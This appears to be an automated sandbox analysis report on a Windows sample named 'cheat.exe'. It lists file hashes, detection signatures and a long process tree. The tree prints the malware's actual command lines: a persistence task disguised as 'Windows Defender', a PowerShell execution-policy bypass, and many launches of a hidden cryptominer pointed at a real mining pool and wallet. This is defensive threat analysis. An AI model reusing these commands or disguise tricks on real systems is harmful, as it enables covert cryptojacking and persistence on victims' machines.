Analysis

  • max time kernel
    151s
  • max time network
    116s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    10-08-2021 11:13

General

  • Target

    cheat.exe

  • Size

    12.2MB

  • MD5

    69c885675b1b98e2fbb3f0196a1df2d1

  • SHA1

    533fa79f3b20623ae1c6de3fded5fb54b145af6a

  • SHA256

    73bcd67ddecc7bf320a19bd5dbefdb36c097c3047959d67e0e3cc5e22f8b510b

  • SHA512

    8b89b0a456e9d423c7e0d053772716f2e0e7877bff250e08f788d20b20fcb00bb6da831f59a781964ede23f9de74b5afcda0183d104fca523b392a89d063e44c

Score
9/10

Malware Config

Signatures

  • Detected Stratum cryptominer command

    Looks to be attempting to contact Stratum mining pool.

  • Executes dropped EXE 31 IoCs
  • VMProtect packed file 59 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 29 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cheat.exe
    "C:\Users\Admin\AppData\Local\Temp\cheat.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4032
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\d.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3700
      • C:\ProgramData\Windows\d.exe
        "C:\ProgramData\Windows\d.exe" 61 C:\ProgramData\Windows\d.bat
        3⤵
        • Executes dropped EXE
        PID:3704
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Windows\t.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1896
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender" /TR "C:\ProgramData\Windows\Start.exe" /f
          4⤵
          • Creates scheduled task(s)
          PID:3340
    • C:\ProgramData\Windows\Start.exe
      C:\ProgramData\Windows\Start.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2104
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\304D.tmp\305D.tmp\305E.bat C:\ProgramData\Windows\Start.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3900
        • C:\Windows\system32\timeout.exe
          timeout /t 10
          4⤵
          • Delays execution with timeout.exe
          PID:752
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -executionpolicy Unrestricted C:\ProgramData\Windows\timeout.ps1
          4⤵
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:204
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ymdnpxx3\ymdnpxx3.cmdline"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1384
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5C10.tmp" "c:\Users\Admin\AppData\Local\Temp\ymdnpxx3\CSCA01756A6D1B482A871A44B1537A164A.TMP"
              6⤵
                PID:3032
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3788
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:1116
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3868
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:680
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3708
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:196
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2284
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:4000
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1028
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:2072
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1372
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:2292
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3128
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:1128
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3604
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:2824
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2528
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:3340
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:840
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:3280
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3036
              • C:\ProgramData\Windows\Defender.exe
                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:2884
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
              5⤵
                PID:3184
                • C:\ProgramData\Windows\Defender.exe
                  "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  PID:2368
              • C:\Windows\System32\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                5⤵
                  PID:1772
                  • C:\ProgramData\Windows\Defender.exe
                    "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:3276
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                  5⤵
                    PID:748
                    • C:\ProgramData\Windows\Defender.exe
                      "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3928
                  • C:\Windows\System32\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                    5⤵
                      PID:496
                      • C:\ProgramData\Windows\Defender.exe
                        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:3584
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                      5⤵
                        PID:2124
                        • C:\ProgramData\Windows\Defender.exe
                          "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:3864
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                        5⤵
                          PID:2260
                          • C:\ProgramData\Windows\Defender.exe
                            "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            PID:2680
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                          5⤵
                            PID:536
                            • C:\ProgramData\Windows\Defender.exe
                              "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:2848
                          • C:\Windows\System32\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                            5⤵
                              PID:752
                              • C:\ProgramData\Windows\Defender.exe
                                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:2240
                            • C:\Windows\System32\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                              5⤵
                                PID:3704
                                • C:\ProgramData\Windows\Defender.exe
                                  "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:4000
                              • C:\Windows\System32\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                5⤵
                                  PID:2536
                                  • C:\ProgramData\Windows\Defender.exe
                                    "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:1276
                                • C:\Windows\System32\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                  5⤵
                                    PID:2288
                                    • C:\ProgramData\Windows\Defender.exe
                                      "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:3604
                                  • C:\Windows\System32\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                    5⤵
                                      PID:2172
                                      • C:\ProgramData\Windows\Defender.exe
                                        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:2816
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                      5⤵
                                        PID:4000
                                        • C:\ProgramData\Windows\Defender.exe
                                          "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:2828
                                      • C:\Windows\System32\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                        5⤵
                                          PID:1276
                                          • C:\ProgramData\Windows\Defender.exe
                                            "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2192
                                        • C:\Windows\System32\WScript.exe
                                          "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                          5⤵
                                            PID:1888
                                            • C:\ProgramData\Windows\Defender.exe
                                              "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              PID:496
                                          • C:\Windows\System32\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                            5⤵
                                              PID:744
                                              • C:\ProgramData\Windows\Defender.exe
                                                "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:580
                                            • C:\Windows\System32\WScript.exe
                                              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                              5⤵
                                                PID:3340
                                                • C:\ProgramData\Windows\Defender.exe
                                                  "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:184
                                              • C:\Windows\System32\WScript.exe
                                                "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
                                                5⤵
                                                  PID:2380
                                                  • C:\ProgramData\Windows\Defender.exe
                                                    "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:2192

                                        Network

                                        MITRE ATT&CK Enterprise v6

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • memory/184-440-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/196-192-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/204-155-0x0000025A76A80000-0x0000025A76A81000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/204-136-0x0000025A76970000-0x0000025A76972000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/204-138-0x0000025A76973000-0x0000025A76975000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/204-137-0x0000025A77570000-0x0000025A77571000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/204-133-0x0000025A76A50000-0x0000025A76A51000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/496-422-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/580-432-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/680-182-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/1116-172-0x00007FFD758E0000-0x00007FFD758E2000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/1116-171-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/1128-232-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/1276-372-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/2072-212-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/2192-448-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/2192-412-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/2240-352-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/2292-222-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/2368-282-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/2680-332-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/2816-392-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/2824-242-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/2828-402-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/2848-342-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/2884-272-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/3276-292-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/3280-262-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/3340-252-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/3584-312-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/3604-382-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/3864-322-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/3928-302-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/4000-202-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB

                                        • memory/4000-362-0x0000000140000000-0x0000000141B19000-memory.dmp

                                          Filesize

                                          27.1MB